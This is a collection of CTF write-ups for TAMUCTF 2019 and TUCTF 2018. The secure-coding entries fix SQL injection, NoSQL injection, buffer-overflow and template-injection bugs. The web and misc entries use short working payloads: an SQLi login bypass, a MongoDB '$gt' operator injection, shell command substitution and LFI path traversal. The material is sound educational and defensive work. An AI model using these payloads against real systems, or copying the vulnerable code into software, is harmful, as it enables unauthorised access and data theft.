    movq    %rdi, -56(%rbp)         ## 8-byte Spill
    movq    %r8, %rdi
    movl    %ecx, -60(%rbp)         ## 4-byte Spill
    movl    %eax, -64(%rbp)         ## 4-byte Spill
    callq   _memset
    movb    $65, -16(%rbp)
    movb    $53, -15(%rbp)
    movb    $53, -14(%rbp)
    movb    $51, -13(%rbp)
    movb    $77, -12(%rbp)
    movb    $98, -11(%rbp)
    movb    $49, -10(%rbp)
    movb    $89, -9(%rbp)
    movl    $0, -28(%rbp)
    movl    $1, -32(%rbp)
    movl    $2, -36(%rbp)
    movl    -36(%rbp), %eax
    imull   -36(%rbp), %eax
    imull   -36(%rbp), %eax
    movl    -28(%rbp), %ecx
    addl    -32(%rbp), %ecx
    addl    -32(%rbp), %ecx
    addl    -32(%rbp), %ecx
    imull   %ecx, %eax
    cltd
    movl    -60(%rbp), %ecx         ## 4-byte Reload
    idivl   %ecx
    movl    %eax, -40(%rbp)
    movl    -36(%rbp), %eax
    imull   -36(%rbp), %eax
    imull   -36(%rbp), %eax
    movl    -28(%rbp), %esi
    addl    -32(%rbp), %esi
    addl    -32(%rbp), %esi
    imull   %esi, %eax
    cltd
    movl    -64(%rbp), %esi         ## 4-byte Reload
    idivl   %esi
    movl    %eax, -44(%rbp)
    movl    -40(%rbp), %esi
    movq    -56(%rbp), %rdi         ## 8-byte Reload
    movb    $0, %al
    callq   _printf
    leaq    L_.str.1(%rip), %rdi
    movl    -44(%rbp), %esi
    movl    %eax, -68(%rbp)         ## 4-byte Spill
    movb    $0, %al
    callq   _printf
    leaq    L_.str.2(%rip), %rdi
    leaq    -16(%rbp), %rsi
    movl    %eax, -72(%rbp)         ## 4-byte Spill
    movb    $0, %al
    callq   _printf
    movq    ___stack_chk_guard@GOTPCREL(%rip), %rsi
    movq    (%rsi), %rsi
    movq    -8(%rbp), %rdi
    cmpq    %rdi, %rsi
    movl    %eax, -76(%rbp)         ## 4-byte Spill
    jne LBB1_2
## %bb.1:
    xorl    %eax, %eax
    addq    $80, %rsp
    popq    %rbp
    retq
LBB1_2:
    callq   ___stack_chk_fail
    ud2
    .cfi_endproc
                                        ## -- End function
    .section    __TEXT,__cstring,cstring_literals
L_.str:                                 ## @.str
    .asciz  "The answer: %d\n"

L_.str.1:                               ## @.str.1
    .asciz  "Maybe it's this:%d\n"

L_.str.2:                               ## @.str.2
    .asciz  "gigem{%s}\n"


.subsections_via_symbols

```
I chose not to reverse the whole assembly listing but just this part, which looks like the flag:
```asm
    movb    $65, -16(%rbp)
    movb    $53, -15(%rbp)
    movb    $53, -14(%rbp)
    movb    $51, -13(%rbp)
    movb    $77, -12(%rbp)
    movb    $98, -11(%rbp)
    movb    $49, -10(%rbp)
    movb    $89, -9(%rbp)
    movl    $0, -28(%rbp)
    movl    $1, -32(%rbp)
    movl    $2, -36(%rbp)
```
This part of the assembly code fills the flag buffer with ASCII values byte by byte; here is a little Python script to get the flag:
```python
# the bytes stored at -16(%rbp) through -9(%rbp), in stack order, decoded as ASCII
flag = "gigem{"
flag += "".join(chr(i) for i in [65, 53, 53, 51, 77, 98, 49, 89])
flag += "}"
print(flag)
```

**Flag:**
gigem{A553Mb1Y}

--------------------------------------------------------------------------------
/TAMUCTF 2019/Secure Coding/SQL.md:
--------------------------------------------------------------------------------
## SQL - Secure Coding

**Challenge:** [https://gitlab.tamuctf.com/root/sql](https://gitlab.tamuctf.com/root/sql)
**Difficulty:** easy
**Solved by:** Neolex

**Solution:**
The goal of this challenge is to secure the vulnerable script of the web challenge "Not Another SQLi Challenge".
Here is the vulnerable script:
```php
<?php
if (isset($_POST["username"]) && isset($_POST["password"])) {
    $servername = "localhost";
    $username = "sqli-user";
    $password = 'AxU3a9w-azMC7LKzxrVJ^tu5qnM_98Eb';
    $dbname = "SqliDB";
    $conn = new mysqli($servername, $username, $password, $dbname);
    if ($conn->connect_error)
        die("Connection failed: " . $conn->connect_error);
    $user = $_POST['username'];
    $pass = $_POST['password'];
    // user input is concatenated straight into the query: the injection point
    $sql = "SELECT * FROM login WHERE User='$user' AND Password='$pass'";
    if ($result = $conn->query($sql))
    {
        if ($result->num_rows >= 1)
        {
            $row = $result->fetch_assoc();
            echo "You logged in as " . $row["User"];
            $row = $result->fetch_assoc();
            echo "You logged in as " . $row["User"] . "\n";
        }
        else {
            echo "Sorry to say, that's invalid login info!";
        }
    }
    $conn->close();
}
else
    echo "Must supply username and password...";
echo "";
?>
```

Here is the diff with the secured code:
```diff
13,14c13,14
< $user = $_POST['username'];
< $pass = $_POST['password'];
---
> $user = mysqli_real_escape_string($conn, $_POST['username']);
> $pass = mysqli_real_escape_string($conn,$_POST['password']);
```

**Flag:**
gigem{the_best_damn_sql_anywhere}

--------------------------------------------------------------------------------
/TAMUCTF 2019/Secure Coding/loginapp2.md:
--------------------------------------------------------------------------------
## LoginApp2 - Secure Coding

**Challenge:** [https://gitlab.tamuctf.com/root/loginapp](https://gitlab.tamuctf.com/root/loginapp)
**Solved by:** Neolex

**Solution:**
The goal of this challenge is to secure the login app2 from the web challenges.
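Review bot: the `13,14c13,14` hunk in the SQL.md diff above only works because both interpolation sites in `$sql` are single-quoted string literals; the query is still assembled by string concatenation, so a later edit that adds an unquoted numeric field would reopen the hole. Prefer a prepared statement, e.g. `$stmt = $conn->prepare("SELECT * FROM login WHERE User=? AND Password=?"); $stmt->bind_param("ss", $user, $pass);`, which also removes the dependence on the connection charset that `mysqli_real_escape_string` carries. The hunk leaves the duplicated `fetch_assoc()`/`echo` pair and the plaintext password comparison untouched; both are outside the challenge's scope but worth a follow-up.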
Here is the vulnerable script:
```javascript
// server.js

const initDb = require("./db").initDb;
const getDb = require("./db").getDb;
const express = require('express');
const app = express();
var bodyParser = require('body-parser')
app.use(bodyParser.json())

var path = require("path");

const PORT = 4000;

initDb(function (err) {
    app.get('/', function(req, res) {
        res.sendFile(path.join(__dirname+'/index.html'));
    });

    app.post('/login', function (req, res) {

        const db = getDb();
        c = db.db('test');

        // the parsed JSON body is used as the query document as-is,
        // so a field may be a MongoDB operator object instead of a string
        var query = {
            username: req.body.username,
            password: req.body.password
        }

        c.collection('users').findOne(query, function (err, user) {
            if(user == null) {
                res.send(JSON.stringify("Login Failed"))
            }
            else {
                resp = "Welcome: " + user['username'] + "!";
                res.send(JSON.stringify(resp));
            }
        });
    });

    app.listen(PORT, function (err) {
        const db = getDb();

        user = {username: 'bob', password: 'lVeYMg4U4$@L'}
        admin = {username: 'admin', password: '945IYMib!u@u'}

        c = db.db('test');
        c.collection('users').insertOne(user)
        c.collection('users').insertOne(admin)

        if (err) {
            throw err; //
        }
        console.log("Up and running on port " + PORT);
    });
});
```
And here is the diff with the secured one:
```diff
8a9
> var sanitize = require('mongo-sanitize');
25,26c26,27
<         username: req.body.username,
<         password: req.body.password
---
>         username: sanitize(req.body.username),
>         password: sanitize(req.body.password)
28d28
<

```

`mongo-sanitize` recursively removes every key that begins with `$` from the submitted value, so a password of `{"$gt": ""}` becomes an empty object, which no stored password equals. Rejecting anything that is not a string (`typeof req.body.password === 'string'`) is the simpler and stricter check, since a login field has no legitimate reason to be an object. The seeded users are also stored with plaintext passwords, which the challenge does not score.

**Flag:**
gigem{3y3_SQL_n0w_6b95d3035a3755a}

--------------------------------------------------------------------------------
/TAMUCTF 2019/Secure Coding/pwn.md:
--------------------------------------------------------------------------------
## PWN - Secure Coding

**Challenge:** [https://gitlab.tamuctf.com/root/pwn](https://gitlab.tamuctf.com/root/pwn)
**Difficulty:** easy
**Solved by:** Neolex

**Solution:**
The goal of this challenge is to secure this vulnerable program:
```C
#include <stdio.h>
/* the name of the second included header was lost in extraction */

void echo()
{
    printf("%s", "Enter a word to be echoed:\n");
    char buf[128];
    gets(buf);          /* no length limit: any line longer than 127 bytes overflows buf */
    printf("%s\n", buf);
}

int main()
{
    echo();
}
```
`gets` has no way to know how large `buf` is, so a longer line overwrites whatever sits above the buffer on the stack, including the saved return address.

Here is the diff with the secured code:
```diff
6c6
<     printf("%s", "Enter a word to be echoed:\n");
---
>     printf("Enter a word to be echoed:\n");
8,9c8,10
<     gets(buf);
<     printf("%s\n", buf);
---
>     if(fgets(buf,128, stdin) != NULL){
>         printf("%s\n", buf);
>     }
```

The second hunk is the actual fix: `fgets(buf, 128, stdin)` reads at most 127 bytes and always NUL-terminates, so the write can no longer leave `buf`. The first hunk is cosmetic. Two details worth keeping in mind: `fgets` keeps the trailing newline in `buf`, so the echo prints an extra blank line, and `sizeof buf` is safer than a literal `128` that has to stay in sync with the declaration by hand.

**Flag:**
gigem{check_that_buffer_size_baby}

--------------------------------------------------------------------------------
/TAMUCTF 2019/Secure Coding/science.md:
--------------------------------------------------------------------------------
## Science - Secure Coding

**Challenge:** [https://gitlab.tamuctf.com/root/science](https://gitlab.tamuctf.com/root/science)
**Difficulty:** easy
**Solved by:** Neolex

**Solution:**
The goal of this challenge is to secure the vulnerable Flask script behind the web challenge Science!.
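As an added illustration (this is not the challenge's code, and it uses plain Jinja2 rather than Flask so that it runs on its own): the two ways of getting the chemical names into the Science! template. The vulnerable version formats the user input into the template source before Jinja compiles it, so a submitted `{{ ... }}` expression is evaluated; the fixed version compiles a fixed template and hands the input over as context variables, where it is data. The function names, the `7*7` probe and the `<b>` sample are assumptions made for the example.

```python
"""Added example: user input as template source vs. user input as template data."""
from jinja2 import Environment

# Flask's render_template_string autoescapes; mirror that here.
env = Environment(autoescape=True)

# Same shape as the challenge's template, minus the surrounding markup.
TEMPLATE_VULNERABLE = "The result of combining {} and {} is:"
TEMPLATE_FIXED = "The result of combining {{ chem1 }} and {{ chem2 }} is:"


def render_vulnerable(chem1, chem2):
    """str.format() splices the input into the template *source*, so Jinja
    compiles whatever the user typed; dir/help/locals are exposed as in
    the challenge's handler."""
    source = TEMPLATE_VULNERABLE.format(chem1, chem2)
    return env.from_string(source).render(dir=dir, help=help, locals=locals)


def render_fixed(chem1, chem2):
    """The template is a constant; the input is passed as context and is
    only ever substituted (and HTML-escaped) as a value."""
    return env.from_string(TEMPLATE_FIXED).render(chem1=chem1, chem2=chem2)


if __name__ == "__main__":
    probe = "{{ 7*7 }}"            # a harmless SSTI probe (assumption)
    print("vulnerable:", render_vulnerable(probe, "water"))   # 49 appears
    print("fixed:     ", render_fixed(probe, "water"))        # probe stays literal
    print("fixed:     ", render_fixed("<b>x</b>", "y"))       # markup is escaped
```

The tell in the original handler is the order of operations: `.format(chem1, chem2)` runs before `render_template_string`, so the template text is different for every request. In the fixed version the template text never changes and the rendering step is the only place the input appears.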
Here is the vulnerable script (the HTML tags inside the template string were lost in extraction and are marked with comments):
```python
import requests
import json
import sys
from tamuctf import app
from flask import Flask, render_template, request, jsonify, render_template_string

@app.route('/')
@app.route('/index')
def index():

    return render_template('index.html')

@app.route('/science', methods=['POST'])
def science():
    try:
        chem1 = request.form['chem1']
        chem2 = request.form['chem2']
        # the user input is formatted into the template SOURCE, then compiled by Jinja
        template = '''
        <!-- markup lost in extraction -->
        <!-- markup lost in extraction -->The result of combining {} and {} is:<!-- markup lost in extraction -->
        <!-- markup lost in extraction -->
        '''.format(chem1, chem2)

        return render_template_string(template, dir=dir, help=help, locals=locals)
    except:
        return "Something went wrong"

```
Here is the diff with the secured code (the markup around the changed line was lost in extraction as well):
```diff
20c20
<         The result of combining {} and {} is:
---
>         The result of combining {{chem1}} and {{chem2}} is:
22,24c22,23
<         '''.format(chem1, chem2)
<
<         return render_template_string(template, dir=dir, help=help, locals=locals)
---
>         '''
>         return render_template_string(template,chem1=chem1,chem2=chem2,dir=dir, help=help, locals=locals)
27d25
<
```

Formatting `chem1` and `chem2` into the template source before `render_template_string` compiles it means that a submitted value such as `{{ 7*7 }}` is evaluated as a Jinja expression (server-side template injection), and the handler helpfully passes `dir`, `help` and `locals` into the template, which makes exploring the interpreter from inside a template easy. The fix compiles a fixed template and passes the input as context variables, so Jinja treats it as data and autoescapes it. The fixed version still hands `dir`, `help` and `locals` to the template; that is harmless once user input can no longer become template code, but there is no reason to keep them.

**Flag:**
gigem{br0k3n_fl4sk_2d88bb862569}

--------------------------------------------------------------------------------
/TAMUCTF 2019/Web/images/loginapp2-request.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ImperiumCTF/Writeups/1a4370560b263623f3ad3d3aa1a9189bab143637/TAMUCTF 2019/Web/images/loginapp2-request.png

--------------------------------------------------------------------------------
/TAMUCTF 2019/Web/loginapp2.md:
--------------------------------------------------------------------------------
## LoginApp2 - Web

**Challenge:** [http://web4.tamuctf.com](http://web4.tamuctf.com)
**Difficulty:** medium
**Solved by:** Neolex

**Solution:**
This challenge is a straightforward NoSQL injection in the login endpoint: the server uses the JSON body as the MongoDB query document, so a field can be an operator object instead of a string.
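As an added example (not the challenge's code, and not a real MongoDB client), the following models why the request below logs in as `admin`, and what the secure-coding fix from the LoginApp2 secure-coding challenge (stripping `$`-prefixed keys, as `mongo-sanitize` does) changes. The matcher is a deliberately small model of MongoDB's query semantics, covering equality and `$gt`/`$ne` only; the two seed users are the ones from the challenge's `server.js`, and the request bodies are constructed here from the POST shown below.

```python
"""Added example: operator injection into a findOne() query document, and the fix."""
import json

# Seed documents, copied from the challenge's server.js.
USERS = [
    {"username": "bob", "password": "lVeYMg4U4$@L"},
    {"username": "admin", "password": "945IYMib!u@u"},
]

# Request bodies (constructed): the injection from the writeup, and an honest wrong guess.
INJECTED_BODY = '{"username": "admin", "password": {"$gt": ""}}'
HONEST_BODY = '{"username": "admin", "password": "wrong"}'


def field_matches(value, condition):
    """Model of how MongoDB matches one field: a plain value is an equality
    test; a dict whose keys start with '$' is a set of operators."""
    if isinstance(condition, dict) and any(k.startswith("$") for k in condition):
        for op, operand in condition.items():
            if op == "$gt":
                # every non-empty string sorts after "", so {"$gt": ""} matches any password
                if not (isinstance(value, str) and value > operand):
                    return False
            elif op == "$ne":
                if value == operand:
                    return False
            else:
                raise ValueError("operator not modelled: " + op)
        return True
    return value == condition


def find_one(collection, query):
    """First document for which every field of the query matches, or None."""
    for doc in collection:
        if all(field_matches(doc.get(k), v) for k, v in query.items()):
            return doc
    return None


def sanitize(value):
    """What mongo-sanitize does: drop every key beginning with '$', recursively."""
    if isinstance(value, dict):
        return {k: sanitize(v) for k, v in value.items() if not k.startswith("$")}
    if isinstance(value, list):
        return [sanitize(v) for v in value]
    return value


def login(body, hardened=False):
    """Mirrors the /login handler: returns the matched username or None."""
    data = json.loads(body)
    username, password = data["username"], data["password"]
    if hardened:
        username, password = sanitize(username), sanitize(password)
        # Stricter than the challenge's diff: credentials must be plain strings.
        if not (isinstance(username, str) and isinstance(password, str)):
            return None
    user = find_one(USERS, {"username": username, "password": password})
    return user["username"] if user else None


if __name__ == "__main__":
    print("vulnerable, injected :", login(INJECTED_BODY))        # admin
    print("vulnerable, wrong pw :", login(HONEST_BODY))          # None
    print("hardened, injected   :", login(INJECTED_BODY, True))  # None
```

The point to take away is that the operator never touches the password string itself: `{"$gt": ""}` turns the password field of the query into a comparison that is true for any stored value, so the `username` equality alone selects the document.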
Here is the request to send:
```
POST /login HTTP/1.1
Host: web4.tamuctf.com
Content-Length: 63
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://web4.tamuctf.com/
X-Requested-With: XMLHttpRequest
User-Agent: Googlebot/2.1 (+http://www.googlebot.com/bot.html)
Content-Type: application/json;charset=UTF-8
Referer: http://web4.tamuctf.com/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

{
    "username": "admin",
    "password": {"$gt": ""}
}
```
`{"$gt": ""}` matches any password that sorts after the empty string, which is every password, so `findOne` returns the `admin` document without the password being known. And we get access to the admin page with the flag:
![](./images/loginapp2-request.png)
**Flag:**
gigem{n0_sql?_n0_pr0bl3m_8a8651c31f16f5dea}

--------------------------------------------------------------------------------
/TUCTF 2018/Misc/hardDOS.md:
--------------------------------------------------------------------------------
## hardDOS - Misc 497:

**Description:** Paying attention is mitey important! (Difficulty: Hard)
**Challenge:** nc 18.216.100.42 12345
**Difficulty:** Medium
**Solved by:** Tahar & Yanis

**Solution:**
We start by connecting to the given target and follow the instructions printed by the remote service: choose option **2**, then **y**. Our input is handed to a shell, so command substitution works; we inject the following payload to list every file on the challenge's server: ```$(ls)```.

We check all the files by running ```file FILENAME``` on each of them so we can identify their types, following the challenge instructions. We find an interesting file, **GRAPHICS.COM**.
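As an added example (not the challenge's code; the service's own implementation is unknown), the following shows why a filename like the `$(ls)` payload above runs a command when it is pasted into a shell command line, and how passing an argv list, or quoting with `shlex.quote`, keeps it literal. It shells out to `echo` instead of `file` so that it runs anywhere with a POSIX `sh`; the payload and filenames are constructed, and a stand-in `$(echo INJECTED)` is used in place of `$(ls)` so the result is predictable.

```python
"""Added example: command substitution through string-built shell commands."""
import shlex
import subprocess

PAYLOAD = "$(echo INJECTED)"   # stands in for the writeup's $(ls) (constructed)


def describe_shell(name):
    """Vulnerable: the name is concatenated into a command line that a shell
    parses, so $(...) is substituted before the command runs."""
    out = subprocess.run("echo " + name, shell=True, capture_output=True, text=True)
    return out.stdout.strip()


def describe_shell_quoted(name):
    """Still uses a shell, but the name is quoted so the shell sees one word."""
    out = subprocess.run("echo " + shlex.quote(name), shell=True,
                         capture_output=True, text=True)
    return out.stdout.strip()


def describe_argv(name):
    """Safe: the name is a single argv element and no shell is involved."""
    out = subprocess.run(["echo", name], capture_output=True, text=True)
    return out.stdout.strip()


if __name__ == "__main__":
    print("shell   :", describe_shell(PAYLOAD))          # INJECTED
    print("quoted  :", describe_shell_quoted(PAYLOAD))   # $(echo INJECTED)
    print("argv    :", describe_argv(PAYLOAD))           # $(echo INJECTED)
    print("argv    :", describe_argv("GRAPHICS.COM"))    # GRAPHICS.COM
```

Blocking a single command such as `type`, as this challenge does, does not help while the input still reaches a shell: the argv form removes the shell from the path entirely, which is the fix that actually holds.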

We run the **strings** command to see what is in there, since the **type** command cannot be used:
```strings GRAPHICS.COM```

**Flag:**
TUCTF{4LW4Y5_1NF3C7_7H353_19742_BY735}

--------------------------------------------------------------------------------
/TUCTF 2018/README.md:
--------------------------------------------------------------------------------
## TUCTF 2018:

TU CTF is an introductory CTF for teams that want to build their experience. We will have the standard categories of Web, Forensics, Crypto, RE, and Exploit, as well as some other categories we don't want to reveal just yet.

--------------------------------------------------------------------------------
/TUCTF 2018/Reverse/Danger_Zone.md:
--------------------------------------------------------------------------------
## Danger Zone - Reverse 112:

**Description:** Legend says, this program was written by Kenny Loggins himself.
**Challenge:** dangerzone.pyc
**Difficulty:** Easy
**Solved by:** Tahar

**Solution:**
We start by downloading the challenge file **dangerzone.pyc** and googling for a way to decompile a **compiled Python file (.pyc)**.

I learned about a Python module named **uncompyle6**, went to its official page and installed it on my Linux box. I followed the documentation and managed to decompile the challenge file into readable Python code =)

I then read that Python code and reversed it from top to bottom until I reached the end and the flag =)

**Flag:**
TUCTF{r3d_l1n3_0v3rl04d}

--------------------------------------------------------------------------------
/TUCTF 2018/Reverse/YeahRight.md:
--------------------------------------------------------------------------------
## Yeahright - Reverse 149:

**Description:** What an insensitive little program. Show it who's boss!
**Challenge:** yeahright + flag + nc 18.224.3.130 12345
**Difficulty:** Easy
**Solved by:** Tahar

**Solution:**
We download both files. The **flag** file isn't really needed for the challenge, but it is good for testing whether you are right or not.

I started by running the **file** command on the **yeahright** binary to get some useful information, and then reverse engineered it.

Reversing the file gives the required password; when we connect to the online challenge service we use it and get the real **flag**.

I tried the password I found and it just worked. Another simple trick is to use a **hex editor**, which is an easy and fast way to get the password, or **IDA Pro**, a GUI-based reverse engineering framework that gets the job done easily and quickly, instead of CLI-based tools like Radare2 or GDB.

**Flag:**
TUCTF{n07_my_fl46_n07_my_pr0bl3m}

--------------------------------------------------------------------------------
/TUCTF 2018/Web/Colonel_Mustard's_Simple_Signin.md:
--------------------------------------------------------------------------------
## Colonel Mustard's Simple Signin - Web 172:

**Description:** We know Col Mustard is up to something--can you find a way in to tell us what?
**Challenge:** http://13.59.239.132/
**Difficulty:** Easy
**Solved by:** Tahar

**Solution:**
We open the challenge URL as usual and notice the same kind of login form as before, but of course it shouldn't be the same solution or the same challenge =)
From experience with many CTFs, most of these login forms are meant to be **SQLi login bypasses**: the form is bypassed by injecting a **Structured Query Language (SQL)** payload that changes the `WHERE` clause of the login query.
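As an added example (not from this writeup or from the TAMUCTF "SQL" secure-coding writeup, which it also illustrates), the following runs the `' or ''='` bypass against a login query built by string formatting, the same construction as the PHP script in that secure-coding challenge, and then runs the same input against a parameterized query. It uses an in-memory SQLite table constructed here; the users and passwords are made up.

```python
"""Added example: the ' or ''=' login bypass vs. a parameterized query (SQLite, stdlib)."""
import sqlite3

PAYLOAD = "' or ''='"


def make_db():
    """Constructed login table with two made-up accounts."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE login (User TEXT, Password TEXT)")
    conn.executemany("INSERT INTO login VALUES (?, ?)",
                     [("admin", "s3cret"), ("guest", "guest")])
    return conn


def run_login(conn, sql, params=()):
    """Returns the sorted list of users the query matched."""
    rows = conn.execute(sql, params).fetchall()
    return sorted(r[0] for r in rows)


def effective_query(user, pw):
    """The statement text the vulnerable path actually executes, for inspection."""
    return f"SELECT User FROM login WHERE User='{user}' AND Password='{pw}'"


def login_vulnerable(conn, user, pw):
    """Same construction as the challenge's PHP:
    "SELECT * FROM login WHERE User='$user' AND Password='$pass'".
    With the payload, the clause becomes  User='' or ''='' AND Password='' or ''=''
    which AND/OR precedence reads as  (...) OR ''=''  : true for every row."""
    return run_login(conn, effective_query(user, pw))


def login_parameterized(conn, user, pw):
    """Placeholders bind the values as data; a quote inside the payload cannot
    change the statement's structure, so the payload is just a wrong password."""
    return run_login(conn, "SELECT User FROM login WHERE User=? AND Password=?", (user, pw))


if __name__ == "__main__":
    conn = make_db()
    print(effective_query(PAYLOAD, PAYLOAD))
    print("vulnerable   :", login_vulnerable(conn, PAYLOAD, PAYLOAD))      # ['admin', 'guest']
    print("parameterized:", login_parameterized(conn, PAYLOAD, PAYLOAD))   # []
```

The payload works in either field, or both: it only needs one `''=''` to be OR-ed onto the end of the clause. Escaping the quotes (what `mysqli_real_escape_string` does in the secure-coding fix) defeats this particular payload; binding parameters defeats the whole class.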
We enter the following payload in both login fields, and the flag appears:
```' or ''='```

**Flag:**
TUCTF{1_4ccu53_c0l0n3l_mu574rd_w17h_7h3_r0p3_1n_7h3_l061n}

--------------------------------------------------------------------------------
/TUCTF 2018/Web/Easter_Egg:_Copper_Gate.md:
--------------------------------------------------------------------------------
## Easter Egg: Copper Gate - Web 258:

**Description:** How did I end up here? - Joker
**Challenge:** http://18.191.227.167/
**Difficulty:** Easy
**Solved by:** Tahar

**Solution:**
We open the URL and do a simple directory brute force (or guess, if you are lucky enough to save time) and find an interesting folder, **.git**. We download the file **http://18.191.227.167/.git/index**, open it in a **hex editor** (the index lists the paths tracked by the repository) and find an interesting folder in it.

**http://18.191.227.167/enterthecoppergate/gate.html** When we open this page we decode the **Base64 string** it contains and we are done!

**Flag:**
TUCTF{W3lc0m3_T0_Th3_04515_Th3_C0pp3r_K3y}

--------------------------------------------------------------------------------
/TUCTF 2018/Web/Easter_Egg:_Crystal_Gate.md:
--------------------------------------------------------------------------------
## Easter Egg: Crystal Gate - Web 446:

**Description:** I don't wanna go anywhere.
**Challenge:** http://18.191.227.167/
**Difficulty:** Easy
**Solved by:** Tahar

**Solution:**
We open the URL and, after a quick directory brute force, find a **.git** directory. We download the index file **http://18.191.227.167/.git/index**, open it in a hex editor and find an interesting folder/file.

**http://18.191.227.167/crystalsfordays/traversethebridge.php** The hint on the page says **Note2: I can't seem to remember the param. It's "file"**, so we use that `file` parameter and exploit it.
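As an added example (not the challenge's code; the PHP behind `traversethebridge.php` is not shown), the following demonstrates how a `file` parameter that is joined onto a directory with no check resolves `../../TheEgg.html` outside the intended directory, and a containment check that rejects it. It builds a small directory layout in a temporary directory; the layout, file names and file contents are constructed for the example, with the include directory placed two levels below the directory that holds `TheEgg.html` to match the `../../` in the URL.

```python
"""Added example: path traversal through an unchecked file parameter, and a realpath check."""
import os
import tempfile


def build_site():
    """Constructed layout:  <tmp>/TheEgg.html  and  <tmp>/crystalsfordays/pages/bridge.html.
    Returns the include base directory (<tmp>/crystalsfordays/pages)."""
    root = tempfile.mkdtemp()
    base = os.path.join(root, "crystalsfordays", "pages")
    os.makedirs(base)
    with open(os.path.join(base, "bridge.html"), "w") as f:
        f.write("the bridge")
    with open(os.path.join(root, "TheEgg.html"), "w") as f:
        f.write("egg contents")          # placeholder, not the real file
    return base


def resolve_vulnerable(base, requested):
    """Joins the user-supplied name onto the base with no check, which is what
    an include of $_GET['file'] amounts to. '..' components walk out of base."""
    return os.path.normpath(os.path.join(base, requested))


def resolve_safe(base, requested):
    """Returns the resolved path only if it is still inside base after
    '..' components and symlinks are resolved; otherwise None."""
    base_real = os.path.realpath(base)
    target = os.path.realpath(os.path.join(base_real, requested))
    if os.path.commonpath([base_real, target]) != base_real:
        return None
    return target


def read_file(base, requested, safe):
    """Serves the requested file the vulnerable or the checked way."""
    path = resolve_safe(base, requested) if safe else resolve_vulnerable(base, requested)
    if path is None or not os.path.isfile(path):
        return None
    with open(path) as f:
        return f.read()


if __name__ == "__main__":
    base = build_site()
    print("unchecked:", read_file(base, "../../TheEgg.html", safe=False))  # egg contents
    print("checked  :", read_file(base, "../../TheEgg.html", safe=True))   # None
    print("checked  :", read_file(base, "bridge.html", safe=True))         # the bridge
```

Comparing the real (symlink-resolved) paths is what makes the check hold: a prefix test on the raw string would accept `../../TheEgg.html` as long as it still began with the base directory.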
It is a **Local File Inclusion (LFI)** vulnerability: the value of `file` is used as a path on the server with no check that it stays inside the intended directory.

**http://18.191.227.167/crystalsfordays/traversethebridge.php?file=** We use this URL to exploit the vulnerability, and it becomes:
```http://18.191.227.167/crystalsfordays/traversethebridge.php?file=../../```. The response lists many files, and the interesting one is **TheEgg.html**.

When we open that file:
**http://18.191.227.167/crystalsfordays/traversethebridge.php?file=../../TheEgg.html** we get the flag!

**Flag:**
TUCTF{3_15_4_M4G1C_NUMB3R_7H3_crys74L_k3Y_15_y0ur5!}

--------------------------------------------------------------------------------
/TUCTF 2018/Web/Easter_Egg:_Jade_Gate.md:
--------------------------------------------------------------------------------
## Easter Egg: Jade Gate - Web 371:

**Description:** Gotta make sure I log my changes. - Joker
**Challenge:** http://18.191.227.167/
**Difficulty:** Easy
**Solved by:** Tahar

**Solution:**
We open the URL as usual. A simple directory brute force shows a **.git** folder. We open it and download the file **http://18.191.227.167/.git/index**, open that index file in a **hex editor** and find an interesting folder and file.

**http://18.191.227.167/youfoundthejadegate/gate.html** The flag is on your screen :P

**Flag:**
TUCTF{S0_Th1s_D035n7_533m_l1k3_175_f41r_8u7_wh0_3v3r_s41d_l1f3_15_f41r?}

--------------------------------------------------------------------------------
/TUCTF 2018/Web/Miss_Scarlet's_Resume_Requests.md:
--------------------------------------------------------------------------------
## Miss Scarlet's Resume Requests - Web 398:

**Description:** Something is up with Miss Scarlet's acting site. Maybe you can take a look?
**Challenge:** http://18.220.239.106/
**Difficulty:** Easy
**Solved by:** Tahar

**Solution:**
We open the URL and head to **http://18.220.239.106/contact.php**, and from there to **http://18.220.239.106/Boddy/**.
We open the page's source code and find a comment hinting at the HTTP method. A simple **curl POST request gets the flag**:

```curl -X POST http://18.220.239.106/Boddy/```

**Flag:**
TUCTF{1_4ccu53_m155_5c4rl37_w17h_7h3_kn1f3_1n_7h3_h77p_r3qu357}

--------------------------------------------------------------------------------
/TUCTF 2018/Web/Mr._Green's_Weird_Website.md:
--------------------------------------------------------------------------------
## Mr. Green's Weird Website - Web 79:

**Description:** While investigating Mr. Green for something completely unrelated, we found this login page. Maybe you can find a way in?
**Challenge:** http://18.219.196.70/
**Difficulty:** Easy
**Solved by:** Tahar

**Solution:**
We open the challenge URL and notice a simple login form. As experience with CTFs suggests, simply trying the default credentials **admin:admin** gives a successful login!

**Flag:**
TUCTF{1_4ccu53_mr._6r33n_w17h_7h3_b4d_p455w0rd_1n_7h3_l061n}

--------------------------------------------------------------------------------
/TUCTF 2018/Web/Mrs._White's_Messy_Maids.md:
--------------------------------------------------------------------------------
## Mrs. White's Messy Maids - Web 25:

**Description:** Mrs. White's simple website might be hiding some murderous intentions...
**Challenge:** http://18.218.152.56/
**Difficulty:** Easy
**Solved by:** Tahar

**Solution:**
We open the challenge URL and go straight to the **source code** of the page.
We see an HTML comment mentioning **/Boddy**, which means there is a web directory of that name on the server. Browsing to that folder gives the flag =)

**Flag:**
TUCTF{1_4ccu53_Mr5._Wh173_w17h_7h3_c4ndl3571ck_1n_7h3_c0mm3n75}

--------------------------------------------------------------------------------
/TUCTF 2018/Web/Professor_Plum's_Ravenous_Researcher.md:
--------------------------------------------------------------------------------
## Professor Plum's Ravenous Researcher - Web 474:

**Description:** Professor Plum is hiring! Maybe you can get the job!
**Challenge:** http://18.223.185.148/
**Difficulty:** Medium
**Solved by:** Tahar

**Solution:**
That was the hardest of all the web challenges; it took many hours to get done :-3
We open the URL as we do with every **web chall**. Following the redirections we land on this page: **http://18.223.185.148/search.php**. I received a hint from an organizer, saying that I must link the names of the other web challs to solve this one and do more OSINT. Ideas then started coming to mind =)

I googled the names of the other web challenges many times and found out that they come from the **Clue board game**. This is the Wikipedia page that helped me a lot in getting this challenge done:
```https://en.wikipedia.org/wiki/Cluedo```

Since the challenge is about locations, I went straight to the **Rooms** section; ```billiard room``` was the right location! It worked and the page now said something else, and I started overthinking.

I thought about running Burp Suite so I could play with the web application the right way ;-)

I was getting angry, frustrated, tired and sleepy (it was 4 AM) when I noticed that a parameter was being sent to the server with the **cookie value 0**.
I just changed that cookie parameter from 0 to **1** and boom, it worked! Finally x'D

**Flag:**
